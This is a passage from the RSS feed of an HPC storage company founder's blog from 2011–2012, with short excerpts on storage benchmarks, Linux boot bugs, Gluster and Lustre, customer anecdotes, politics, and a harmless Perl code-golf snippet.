      <guid>https://blog.scalability.org/2012/04/update-on-our-lawyergram/</guid>
      <description>A few months ago, the bank which had foreclosed on our now former landlord executed what could be called a legal pressure maneuver. They wanted us to buy the space we are renting. They threatened to sue us for back rent. Our lawyer skillfully deflected this, pointing out their several failures in the process. They finally admitted they were seeking to pressure us to buy it. Go figure. So we are about to move to a larger spot.</description>
    </item>
    
    <item>
      <title>The danger in modifying precision built and tuned machines ...</title>
      <link>https://blog.scalability.org/2012/04/the-danger-in-modifying-precision-built-and-tuned-machines/</link>
      <pubDate>Thu, 19 Apr 2012 05:08:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/the-danger-in-modifying-precision-built-and-tuned-machines/</guid>
      <description>&amp;hellip; is that they won&amp;rsquo;t be precision tuned after you are done with them. And worse, much of this is self-inflicted in various cases. We try to ship absolutely peak performance machines. Tuned as much as possible, though in some cases, customers make requests that go against high performance. We try to explain the issues, but customers are always right, even when they aren&amp;rsquo;t. In a number of cases, customers wipe what we&amp;rsquo;ve done.</description>
    </item>
    
    <item>
      <title>&#34;Hey, here&#39;s a nice machine, let&#39;s replace its motherboard&#34;</title>
      <link>https://blog.scalability.org/2012/04/hey-heres-a-nice-machine-lets-replace-its-motherboard/</link>
      <pubDate>Thu, 19 Apr 2012 04:53:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/hey-heres-a-nice-machine-lets-replace-its-motherboard/</guid>
      <description>Something like this just happened to one of our customers. I am aghast that this was done the way it was, but it was. One of these things where you don&amp;rsquo;t find out that there was a service issue until it&amp;rsquo;s &amp;ldquo;done&amp;rdquo;. For various definitions of &amp;ldquo;done&amp;rdquo;. I anticipate being on a phone call to Europe in a few hours to discuss my definition of &amp;ldquo;done&amp;rdquo; with the people who did this, and ask them if their definition of &amp;ldquo;done&amp;rdquo; includes the concept of operating correctly.</description>
    </item>
    
    <item>
      <title>Mebbe there is a reason that I am in &#34;fly over&#34; country ...</title>
      <link>https://blog.scalability.org/2012/04/mebbe-there-is-a-reason-that-i-am-in-fly-over-country/</link>
      <pubDate>Thu, 19 Apr 2012 04:29:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/mebbe-there-is-a-reason-that-i-am-in-fly-over-country/</guid>
      <description>So here I am, toiling in the salt mines (just don&amp;rsquo;t tell my wife it&amp;rsquo;s not really that bad), trying to eke out a living selling, servicing, and supporting some insanely fast storage kit to a range of customers, when I hear that Instagram had sold for $1B. My first thought. What the 4K (phonetic, just don&amp;rsquo;t say it out loud) is Instagram? And what did it do that made it worth $1B?</description>
    </item>
    
    <item>
      <title>Way way back ...</title>
      <link>https://blog.scalability.org/2012/04/way-way-back/</link>
      <pubDate>Tue, 17 Apr 2012 20:27:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/way-way-back/</guid>
      <description>&amp;hellip; when I was at SGI &amp;hellip; oh &amp;hellip; 16 years ago or so, someone, for some reason sent me an email where they made some specious claims. I calmly pointed out to them where I caught their error, what the error was, and how they could fix it. They then proceeded to attack me in email, and started bugging me on my work phone. Later, after I had left SGI and started Scalable, someone had posted some rather poorly thought out discussion of something, and attacked me (again) for some rather idiotic reasoning.</description>
    </item>
    
    <item>
      <title>Is LinkedIn just Usenet with a pretty face?</title>
      <link>https://blog.scalability.org/2012/04/is-linkedin-just-usenet-with-a-pretty-face/</link>
      <pubDate>Tue, 17 Apr 2012 20:11:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/is-linkedin-just-usenet-with-a-pretty-face/</guid>
      <description>I am starting to think so. Had a little discussion with someone I thought would be professional, who made some interesting claims, and didn&amp;rsquo;t quite like it when challenged. And it devolved from there. I guess it is funny to see someone try to explain stuff to me, who doesn&amp;rsquo;t quite know my background, or experience, or &amp;hellip; I&amp;rsquo;ve heard from others who believe that LinkedIn is as complete a waste of time as Facebook.</description>
    </item>
    
    <item>
      <title>OT: Annoying spammers</title>
      <link>https://blog.scalability.org/2012/04/ot-annoying-spammers/</link>
      <pubDate>Mon, 16 Apr 2012 16:31:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/ot-annoying-spammers/</guid>
      <description>Some idiots have taken our company&amp;rsquo;s phone number, inserted it into their caller-id bits (seemingly with SIP phones), and have been harassing people. So we get frustrated people calling us, asking us if we called them. No we didn&amp;rsquo;t. I hate phone marketeers as much as everyone. This is really annoying. Can&amp;rsquo;t see any rational reason for this other than someone trying to steal the company&amp;rsquo;s reputation.</description>
    </item>
    
    <item>
      <title>sad/exciting time ahead</title>
      <link>https://blog.scalability.org/2012/04/sadexciting-time-ahead/</link>
      <pubDate>Mon, 16 Apr 2012 14:57:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/sadexciting-time-ahead/</guid>
      <description>One of our customers has become fed up with the issues they&amp;rsquo;ve run into on Gluster. Started about a year ago, with some odd outages in the 3.0.x system, and didn&amp;rsquo;t improve with 3.2.x &amp;hellip; in some instances it got worse. RDMA support in 3.0.x was pretty good, there were other bugs (which were annoying). The migration to 3.2.x was rocky. Libraries left from 3.0.x were somehow picked up and some things just failed.</description>
    </item>
    
    <item>
      <title>High performance firewall ... with a nice 10GbE port</title>
      <link>https://blog.scalability.org/2012/04/high-performance-firewall-with-a-nice-10gbe-port/</link>
      <pubDate>Mon, 16 Apr 2012 03:38:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/high-performance-firewall-with-a-nice-10gbe-port/</guid>
      <description>Have a customer with a hard problem. They need to handle very high data rate traffic, VPNs, and all manner of things. Imagine a GbE in (or more). They asked us to build a firewall that could handle this. Most of the appliance firewalls have some capability, but few will really survive a serious traffic onslaught. Most use very low power processors, on purpose, because most of the time the traffic isn&amp;rsquo;t intense.</description>
    </item>
    
    <item>
      <title>SRP joy</title>
      <link>https://blog.scalability.org/2012/04/srp-joy/</link>
      <pubDate>Thu, 12 Apr 2012 14:47:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/srp-joy/</guid>
      <description>ok, not really. Late last night, while benchmarking some alternative mechanisms to connect {MD,OS}S to their respective {MD,OS}T for a Lustre design we are proposing for an RFP, I decided to revisit SRP. I liked SRP in the past, it was a simple protocol, SCSI over RDMA. How could you go wrong with this? Well, I found out last night. I put our stack on a DeltaV connected with a 10GbE and QDR IB ports to our respective switches.</description>
    </item>
    
    <item>
      <title>hadn&#39;t seen this before ... spot on though ...</title>
      <link>https://blog.scalability.org/2012/04/hadnt-seen-this-before-spot-on-though/</link>
      <pubDate>Sat, 07 Apr 2012 13:46:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/hadnt-seen-this-before-spot-on-though/</guid>
      <description>About the job prospects for your future, when you make the career and training choice to be a scientist. Or &amp;ldquo;If I knew then what I know now, I would have followed a different path&amp;rdquo;. I spent some time visiting my parents recently, and I groused to them that after ~7 years in grad school, I was, ostensibly, a PC technician. Yeah, I am running a profitable and growing company, making some of the fastest storage available.</description>
    </item>
    
    <item>
      <title>Taking siFlash-SSD out for a spin, and cracking the throttle ...</title>
      <link>https://blog.scalability.org/2012/04/taking-siflash-ssd-out-for-a-spin-and-cracking-the-throttle/</link>
      <pubDate>Wed, 04 Apr 2012 04:41:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/taking-siflash-ssd-out-for-a-spin-and-cracking-the-throttle/</guid>
      <description>&amp;hellip; half open. [update] video [FLOWPLAYER=http://scalability.org/wp-content/videos/screencast_video.flv,480,315] I won&amp;rsquo;t show the fio output until I get the unit back and get some more testing in. Also, I&amp;rsquo;ve discovered something &amp;hellip; I guess &amp;hellip; depressing about fio, in that what it reports for performance isn&amp;rsquo;t necessarily what the storage subsystem sees. This isn&amp;rsquo;t just fio, it&amp;rsquo;s pretty much all tools that talk to the file/storage API at a high level. The low level actual results (you have to grab data from the OS reporting infrastructure to see this) differ, sometimes wildly, from the high level API results.</description>
    </item>
    
    <item>
      <title>HPC Linux on Wall Street was fun</title>
      <link>https://blog.scalability.org/2012/04/hpc-linux-on-wall-street-was-fun/</link>
      <pubDate>Wed, 04 Apr 2012 04:26:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/hpc-linux-on-wall-street-was-fun/</guid>
      <description>Spoke to lots of interesting people. Ran some benchmarks. Will talk about those next post. Found hits on the corporate site from a Yahoo stock board. Ok, that was interesting. Had a number of great conversations &amp;hellip; before, during, and after the show. I am still in NY, working on a siCluster at a data center.</description>
    </item>
    
    <item>
      <title>Looking forward to the HPC Linux on Wall Street conference</title>
      <link>https://blog.scalability.org/2012/03/looking-forward-to-the-hpc-linux-on-wall-street-conference/</link>
      <pubDate>Thu, 29 Mar 2012 05:25:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/looking-forward-to-the-hpc-linux-on-wall-street-conference/</guid>
      <description>Will be there with a new siFlash unit. Uses some new Flash and SSD devices. Should be able to talk about that soon. What&amp;rsquo;s cool is that this is our own chassis. Not a COTS chassis from one of the larger vendors. This is a new chassis we worked on designing with the ODM. The unit is a prototype, and sadly the motherboard we will use for this isn&amp;rsquo;t quite in full production yet, so we are using a stand in.</description>
    </item>
    
    <item>
      <title>This is huge: USSC throws out gene patents</title>
      <link>https://blog.scalability.org/2012/03/this-is-huge-ussc-throws-out-gene-patents/</link>
      <pubDate>Mon, 26 Mar 2012 21:59:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/this-is-huge-ussc-throws-out-gene-patents/</guid>
      <description>If I read this correctly, this applies to all gene patents. Which opens up genes to multiple groups trying to target specific diseases. It&amp;rsquo;s good for people as it increases the likelihood that no one company can &amp;ldquo;landgrab&amp;rdquo; a set of genes implicated in various diseases and do nothing with them. It&amp;rsquo;s bad for the business models of companies attacking these diseases, especially smaller biotechs/startups. The model wasn&amp;rsquo;t sound to begin with, you cannot patent nature or natural things.</description>
    </item>
    
    <item>
      <title>Incredibly busy as usual</title>
      <link>https://blog.scalability.org/2012/03/incredibly-busy-as-usual/</link>
      <pubDate>Thu, 22 Mar 2012 00:58:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/incredibly-busy-as-usual/</guid>
      <description>I have lots of drafts in queue, just not enough time to finish them. I&amp;rsquo;ll make a concerted effort this weekend. As an update to a previous post, I managed not to collapse during my brown belt test (had some respiratory issue going on &amp;hellip; allergies, or a cold, or something). The kata were not &amp;ldquo;hard&amp;rdquo;, but they expect different things from you at higher rankings. You can&amp;rsquo;t go blasting through the kata like a robot (as I probably did with my first one).</description>
    </item>
    
    <item>
      <title>&#34;Irrevocable worldwide...&#34;</title>
      <link>https://blog.scalability.org/2012/03/irrevocable-worldwide/</link>
      <pubDate>Thu, 15 Mar 2012 19:45:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/irrevocable-worldwide/</guid>
      <description>Every now and then we get customers asking us to perform only services under contract. They send us what they think their T&amp;amp;C ought to be. Yeah &amp;hellip; I especially like the lines that relieve us of our IP, our rights to collect royalties, our rights to what we develop, &amp;hellip; Yeah. Ok, maybe not so much. I have to admit, when I see this, my first reaction is to start laughing.</description>
    </item>
    
    <item>
      <title>Tiburon extensions</title>
      <link>https://blog.scalability.org/2012/03/tiburon-extensions/</link>
      <pubDate>Sat, 10 Mar 2012 22:41:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/tiburon-extensions/</guid>
      <description>Basically, I can boot quite a few Linux systems completely stateless. I like this. Makes setting up clusters drop-dead simple. Makes setting up/testing hardware similarly simple. Where I am going with this: I&amp;rsquo;ve been playing with Solaris 11, and to a lesser extent, the Illumian distros for Solaris. So far, I like what I see in Solaris 11, and I like the Debian-ed version of Solaris in the Illumian distro. For the former, I want to see if we can formally offer this on our gear.</description>
    </item>
    
    <item>
      <title>Code angry: fixing a self-inflicted bug in Tiburon</title>
      <link>https://blog.scalability.org/2012/03/code-angry-fixing-a-self-inflicted-bug-in-tiburon/</link>
      <pubDate>Sat, 10 Mar 2012 22:32:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/code-angry-fixing-a-self-inflicted-bug-in-tiburon/</guid>
      <description>I hate when I try to write generalized code up front. That is, I try to write a code base that is sufficiently generic that it works for all possible use cases. Some argue for this sort of development. I don&amp;rsquo;t like it. But I do fall into this every now and then. Tiburon suffered from some of this. I want one system to &amp;ldquo;bind them all, and in the PXE process, boot them.</description>
    </item>
    
    <item>
      <title>Cool bug in grub in Centos 6.2 (and therefore in RHEL 6.2)</title>
      <link>https://blog.scalability.org/2012/03/cool-bug-in-grub-in-centos-6-2-and-therefore-in-rhel-6-2/</link>
      <pubDate>Thu, 08 Mar 2012 05:39:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/cool-bug-in-grub-in-centos-6-2-and-therefore-in-rhel-6-2/</guid>
      <description>So if you are like us, you are a belt and suspenders person &amp;hellip; you like multiple administrative modalities. You like them because you know they are needed. Because breakage usually happens at the least opportune time, and you need a way in to express your control. So we have KVM. And we have IPMI. And we have a serial over lan (replacing the old serial consoles). If you are more than 5 miles away from the gear, you will appreciate having these multiple modes.</description>
    </item>
    
    <item>
      <title>Another step in a journey of many miles</title>
      <link>https://blog.scalability.org/2012/03/another-step-in-a-journey-of-many-miles/</link>
      <pubDate>Wed, 07 Mar 2012 20:58:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/another-step-in-a-journey-of-many-miles/</guid>
      <description>This is OT from HPC and from Storage. Sort of. The death this past week of Andrew Breitbart, whether you liked him, hated him, or hadn&amp;rsquo;t a clue who he was, again highlighted for me, the need to take time off, for me, every now and then. Just a few hours per week of time to get out and exercise. To burn off frustration from high on the pony scale discussions.</description>
    </item>
    
    <item>
      <title>Thought I was going nuts ...</title>
      <link>https://blog.scalability.org/2012/03/thought-i-was-going-nuts/</link>
      <pubDate>Fri, 02 Mar 2012 17:28:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/thought-i-was-going-nuts/</guid>
      <description>Ran into this earlier in the week and thought it strange. Centos 6.2, brand new installation on a box that had previously had Centos 5.7 installed. A set of our newer RAID cards, 10GbE, and IB cards. This is our in-lab JackRabbit JR5 machine (happily still the fastest single spinning rust machine you can get in market). As soon as I start the PXE load &amp;hellip; CRASH!!!! The kernel doesn&amp;rsquo;t panic, it just gets stuck.</description>
    </item>
    
    <item>
      <title>then comes the realization ...</title>
      <link>https://blog.scalability.org/2012/03/then-comes-the-realization/</link>
      <pubDate>Thu, 01 Mar 2012 17:08:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/then-comes-the-realization/</guid>
      <description>that to process all the requests, and service all the potential business we have, I&amp;rsquo;m gonna have to hire a Joe-clone (since cloning is illegal in Michigan for some reason). Possibly 2. Let&amp;rsquo;s see if we get these contracts first, but this is a good problem to have. But back to the Joe-clone &amp;hellip; would we be allowed to not pay a clone of me, or provide health coverage, as they were just another instance of the &amp;ldquo;Joe&amp;rdquo; object?</description>
    </item>
    
    <item>
      <title>back from the UK, and a good reason to drink Guinness</title>
      <link>https://blog.scalability.org/2012/02/back-from-the-uk-and-a-good-reason-to-drink-guiness/</link>
      <pubDate>Sun, 26 Feb 2012 15:57:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/back-from-the-uk-and-a-good-reason-to-drink-guiness/</guid>
      <description>I enjoyed my trip. Well, not the part of being away from my family, but there is much to see/experience in London. A curious difference between London and the UK in general and the US is the apparent lack of public restrooms (or WC&amp;rsquo;s if I have the right localization). Especially in a crowded space like Covent Garden. The customers in the UK (spent time with two at their sites, on the phone with ~5 across the world, and working with ~4 via email) have good problems (not as in blocking problems, but emergent problems that occur in a variety of use cases).</description>
    </item>
    
    <item>
      <title>Check one item off my bucket list</title>
      <link>https://blog.scalability.org/2012/02/check-one-item-off-my-bucket-list/</link>
      <pubDate>Sat, 18 Feb 2012 17:14:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/check-one-item-off-my-bucket-list/</guid>
      <description>Spent the early afternoon at Westminster Abbey. Saw the tombs/memorials of Sir Isaac Newton (all of physics), James Clerk Maxwell (electromagnetic theory), Faraday (magnetism), and PAM Dirac (quantum theory). A shame they didn&amp;rsquo;t have anything for Turing (or if I missed it, lemme know and I&amp;rsquo;ll go back). Also saw memorials and tombs for Shakespeare (he&amp;rsquo;s buried at Stratford-upon-Avon I think), Chaucer, Jane Austen, Keats, Shelley, &amp;hellip; Very nice place, highly recommend it.</description>
    </item>
    
    <item>
      <title>The blame game</title>
      <link>https://blog.scalability.org/2012/02/the-blame-game/</link>
      <pubDate>Fri, 10 Feb 2012 05:23:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/the-blame-game/</guid>
      <description>This isn&amp;rsquo;t what you might think from the title. It&amp;rsquo;s an observation. I hope I don&amp;rsquo;t misstate what I intend to say, so feel free to chime in if you don&amp;rsquo;t agree with the wording. When a customer has a set of vendors, and a problem that needs resolution, the customer will gravitate towards assigning blame for the problem to the most competent and most proactive of the vendors, in the hope that it will be resolved, regardless of whether or not that vendor&amp;rsquo;s gear/stack is in any way involved.</description>
    </item>
    
    <item>
      <title>This made me chuckle a bit ... as there is at least a little truth to it ...</title>
      <link>https://blog.scalability.org/2012/02/this-made-me-chuckle-a-bit-as-there-is-at-least-a-little-truth-to-it/</link>
      <pubDate>Fri, 10 Feb 2012 05:06:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/this-made-me-chuckle-a-bit-as-there-is-at-least-a-little-truth-to-it/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Working on solving a problem for the day job</title>
      <link>https://blog.scalability.org/2012/02/working-on-solving-a-problem-for-the-day-job/</link>
      <pubDate>Mon, 06 Feb 2012 18:29:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/working-on-solving-a-problem-for-the-day-job/</guid>
      <description>Long ago, I concluded that the day job was not a bank or credit granting institution. We aren&amp;rsquo;t equity financed at this time, have no finance arm/division with capital backing to provide large credit for customers to purchase with. And we have customers. Lots of them. Many/most asking for credit terms. But we can&amp;rsquo;t really float a loan of 1/5 of our yearly revenue for 90 days as some of these opportunities would require.</description>
    </item>
    
    <item>
      <title>Well, I&#39;d call this the best commercial I saw during the game</title>
      <link>https://blog.scalability.org/2012/02/well-id-call-this-the-best-commercial-i-saw/</link>
      <pubDate>Mon, 06 Feb 2012 04:07:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/well-id-call-this-the-best-commercial-i-saw/</guid>
      <description>In part, because they weren&amp;rsquo;t overtly &amp;hellip; or even subtly &amp;hellip; selling anything.
You can see the commercials here.</description>
    </item>
    
    <item>
      <title>All hail the New York Giants ...</title>
      <link>https://blog.scalability.org/2012/02/all-hail-the-new-york-giants/</link>
      <pubDate>Mon, 06 Feb 2012 03:00:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/all-hail-the-new-york-giants/</guid>
      <description>Good game &amp;hellip; good game. Commercials were kinda lame though.</description>
    </item>
    
    <item>
      <title>Sorry about that</title>
      <link>https://blog.scalability.org/2012/02/sorry-about-that/</link>
      <pubDate>Sat, 04 Feb 2012 17:37:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/sorry-about-that/</guid>
      <description>Was working on a post about the upcoming US elections. It wasn&amp;rsquo;t ready. I had edited it a number of times, and hadn&amp;rsquo;t gotten my complete thoughts down. Managed to hit the publish button midway through. Pulled it down. It wasn&amp;rsquo;t ready for consumption. Short version: US politics, always a messy game, is going to be ugly this year. We have hard-core ideologues arrayed on the (effectively 2) sides, unwilling to compromise their positions for a &amp;ldquo;greater good&amp;rdquo; of the body politic.</description>
    </item>
    
    <item>
      <title>Ahhh ... the wafting smell of election year politics ...</title>
      <link>https://blog.scalability.org/2012/02/ahhh-the-wafting-smell-of-election-year-politics/</link>
      <pubDate>Sat, 04 Feb 2012 16:04:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/ahhh-the-wafting-smell-of-election-year-politics/</guid>
      <description>Yeah, every few years we get some major stank drifting through our corner of the globe. This is going to be a very nasty election cycle. Very nasty. Many of the memes have been tried out against some of the candidates, and what stuck &amp;hellip; well &amp;hellip; stuck (and stunk). As usual, the good and bright people, the ones we need to be in office to help make hard decisions and lead &amp;hellip; once again, these folks don&amp;rsquo;t seem to want all that goes with the process.</description>
    </item>
    
    <item>
      <title>Highest sustained spinning rust write speed to date on a box</title>
      <link>https://blog.scalability.org/2012/02/highest-sustained-spinning-rust-write-speed-to-date-on-a-box/</link>
      <pubDate>Fri, 03 Feb 2012 18:41:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/highest-sustained-spinning-rust-write-speed-to-date-on-a-box/</guid>
      <description>Yeah &amp;hellip; the day job hardware. Current generation. Single box. Single thread. Single file system.
Run status group 0 (all jobs): WRITE: io=130692MB, aggrb=4702.9MB/s, minb=4815.8MB/s, maxb=4815.8MB/s, mint=27790msec, maxt=27790msec  File size is several times RAM size.</description>
    </item>
    
    <item>
      <title>Growth at day job last year: 60%-ish</title>
      <link>https://blog.scalability.org/2012/02/growth-at-day-job-last-year-60-ish/</link>
      <pubDate>Thu, 02 Feb 2012 15:48:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/growth-at-day-job-last-year-60-ish/</guid>
      <description>Considering the economy, the hard drive manufacturing issues in Thailand, etc. Yeah, this is pretty awesome. Gonna have a big tax bill. And yes, I am gonna grumble that the money would be better spent on ~3 new employees who would generate real economic activity, rather than sending it to the government to waste. Such is life. I don&amp;rsquo;t want to prognosticate for the year, just yet. But the trajectory we are on is making last year (our 3rd record year in a row), look &amp;hellip; mild.</description>
    </item>
    
    <item>
      <title>Busy ... as usual</title>
      <link>https://blog.scalability.org/2012/02/busy-as-usual/</link>
      <pubDate>Thu, 02 Feb 2012 15:43:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/busy-as-usual/</guid>
      <description>I&amp;rsquo;ve been readying a UPS ripping post (not the function, but the company). May backburner that for now. But been really REALLY busy. This is very good, in all aspects. Have lots of opportunities, many quotes out, some telegraphed orders (we know they are coming, we&amp;rsquo;ve been told, working their way through the systems), &amp;hellip; this is turning out to be a very good year, and it&amp;rsquo;s only 2-Feb. Hoping I have time to actually write that longer business model post.</description>
    </item>
    
    <item>
      <title>Exactly</title>
      <link>https://blog.scalability.org/2012/01/exactly/</link>
      <pubDate>Sun, 29 Jan 2012 02:15:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/exactly/</guid>
      <description>Article here. It&amp;rsquo;s interesting that they make very similar points to what I&amp;rsquo;ve suggested in the past. Even more to the point, they bring up the very real specter of Lysenkoism rearing its ugly head &amp;hellip; but now we can call it AGW-ism or CO2-ism. If you dare disagree with those in power, you will be fired and shunned. Lack of evidentiary support be damned, full speed ahead. Lysenko set back Soviet-era biology by decades.</description>
    </item>
    
    <item>
      <title>Every now and then ...</title>
      <link>https://blog.scalability.org/2012/01/every-now-and-then/</link>
      <pubDate>Tue, 24 Jan 2012 23:56:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/every-now-and-then/</guid>
      <description>we give a quote to someone, they see a part number, find a vendor who is selling this at some enhanced discount for any number of reasons, and then ask us to match it. I am guessing that they don&amp;rsquo;t realize we actually compare our costs to various measures, and make sure our pricing is not out of whack (sometimes our suppliers just can&amp;rsquo;t seem to give us the same deals they give others, go figure).</description>
    </item>
    
    <item>
      <title>Intel snarfs up Qlogic Infiniband</title>
      <link>https://blog.scalability.org/2012/01/intel-snarfs-up-qlogic-infiniband/</link>
      <pubDate>Mon, 23 Jan 2012 19:10:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/intel-snarfs-up-qlogic-infiniband/</guid>
      <description>I guess this gets Qlogic out of the IB arena. Good catch by Rich at InsideHPC. I had spoken to a number of folks at Intel over the years w.r.t. IB, and they said they were keeping their options open. IB riser boards are available for some of their MBs, and from what I have seen, Intel has a renewed push into the MB space. Not sure about the server space in general; they&amp;rsquo;ve always had that and I think they will keep doing this (at least as a reference design basis).</description>
    </item>
    
    <item>
      <title>Fun with primes</title>
      <link>https://blog.scalability.org/2012/01/fun-with-primes/</link>
      <pubDate>Sun, 22 Jan 2012 05:42:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/fun-with-primes/</guid>
      <description>A long time ago, in a galaxy far &amp;hellip; far &amp;hellip; away &amp;hellip; I&amp;rsquo;ve been playing with primes for a while &amp;hellip; computing them, etc. Have a neat way to represent any natural number (excluding 0) in terms of the exponents of its prime factors. Lots of reasons for playing with this. Started doing this before joining SGI &amp;hellip; many moons ago, and used it as a way to entertain myself on airplanes when the laptop battery ran out.</description>
    </item>
    
    <item>
      <title>A few months into the gluster acquisition by Red Hat ...</title>
      <link>https://blog.scalability.org/2012/01/a-few-months-into-the-gluster-acquisition-by-red-hat/</link>
      <pubDate>Sat, 14 Jan 2012 16:47:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/a-few-months-into-the-gluster-acquisition-by-red-hat/</guid>
      <description>&amp;hellip; just received a note indicating that our Gluster Reseller contract was voided, and that we would be seeing a new partner portal for Red Hat Storage coming soon, where we could apply again for reseller status. Hmmm &amp;hellip;. Reading over the information I saw on the Red Hat storage platform, it looks like they are going the full-on appliance route, which diminishes the value we can potentially add to the platform, and removes much of the differentiation we can do at the stack level (better kernels, up-to-date drivers, tweaked/tuned drivers/OS, &amp;hellip;).</description>
    </item>
    
    <item>
      <title>Hmmm ...</title>
      <link>https://blog.scalability.org/2012/01/hmmm/</link>
      <pubDate>Sat, 14 Jan 2012 16:06:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/hmmm/</guid>
      <description>Saw this linked from /.. UEFI boot is replacing the old BIOS boot. There are positives and negatives about this. New software is always buggy, and UEFI won&amp;rsquo;t magically become bug-free. UEFI has security controls for signed OS booting (ostensibly to protect users). But the abuse of security systems to exclude competitive/alternative booting &amp;hellip; yeah &amp;hellip; maybe not such a good idea. It looks like Microsoft is trying to demand that its hardware ARM partners not enable anything but Windows 8 or an equivalent signed OS (is Android signed?</description>
    </item>
    
    <item>
      <title>OT: What is and what should never be</title>
      <link>https://blog.scalability.org/2012/01/ot-what-is-and-what-should-never-be/</link>
      <pubDate>Thu, 05 Jan 2012 13:59:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/ot-what-is-and-what-should-never-be/</guid>
      <description>Had to get a Led Zeppelin reference in at least once a year on the blog &amp;hellip; Pathology report came back. Ok, in the movie series The Matrix, there is a set of scenes where the storytellers want you to believe that the character (Neo, in the case of the clip below) was moving with &amp;ldquo;super-human&amp;rdquo; speed, and able to move and accelerate a very large mass (their body) faster than a very tiny mass (the bullet).</description>
    </item>
    
    <item>
      <title>More than a year in, and where are they now?</title>
      <link>https://blog.scalability.org/2012/01/more-than-a-year-in-and-where-are-they-now/</link>
      <pubDate>Mon, 02 Jan 2012 15:03:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/more-than-a-year-in-and-where-are-they-now/</guid>
      <description>It&amp;rsquo;s 2-January-2012, and assuming the Mayans were wrong (ok, technically I&amp;rsquo;ve not heard of any suggestion they did anything more than stop their calendar on a convenient-for-them boundary), an interesting question is: what has happened to the company-formerly-known-as-Sun&amp;rsquo;s HPC assets? Lustre is one of the most well known, and it now has some type of future ahead of it. I&amp;rsquo;ll talk about that in a later post. This future was most definitely not assured 1 year ago, and there was considerable uncertainty about its longevity, as Oracle had, about a year ago, let go most of the developers.</description>
    </item>
    
    <item>
      <title>OT:  T&#43;7 hours ... its done</title>
      <link>https://blog.scalability.org/2011/12/ot-t4-5-hours-the-waiting-is-the-hardest-part/</link>
      <pubDate>Thu, 29 Dec 2011 17:45:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ot-t4-5-hours-the-waiting-is-the-hardest-part/</guid>
      <description>Bilateral Mastectomy with a sentinel node biopsy. The latter appears to be clean. I can exhale now. Well, mostly. The more detailed pathology data should be ready next week. The rebuilding part is in process. Another few hours. Readying some good jokes to keep the Mrs. happy. Let her know not to worry. U of M hospital guest internet is &amp;hellip; annoying. Looks like they let 3 TCP ports out to the world (22, 80, 443).</description>
    </item>
    
    <item>
      <title>Oh no, more code golf!</title>
      <link>https://blog.scalability.org/2011/12/oh-no-more-code-golf/</link>
      <pubDate>Mon, 26 Dec 2011 15:03:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/oh-no-more-code-golf/</guid>
      <description>A new code golfing site. Gaaaak! If I have time to work on such diversions, I&amp;rsquo;ll post mine under the ID numbercruncher. [update] Played with the starburst code. Have something that works (though they failed to specify their input method, or their output requirement, e.g. newlines, etc.) This is at 135 characters:
&amp;lt;code&amp;gt; $l=@a=split//,shift;$i=-1;while($i++&amp;lt; $l){map$x[$_]=&amp;quot; &amp;quot;,0..$l;$i==int$l/2?@x=@a:map$x[$_]=$a[$i],$i,$l/2,$l-$i-1;print join&amp;quot;&amp;quot;,@x,&amp;quot;\n&amp;quot;;} &amp;lt;/code&amp;gt;  which for the input &amp;ldquo;asdfd&amp;rdquo; gives
a a a sss asdfd fff d d d  among other things.</description>
    </item>
    
    <item>
      <title>This one hits it out of the park ...</title>
      <link>https://blog.scalability.org/2011/12/this-one-hits-it-out-of-the-park/</link>
      <pubDate>Fri, 23 Dec 2011 03:43:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/this-one-hits-it-out-of-the-park/</guid>
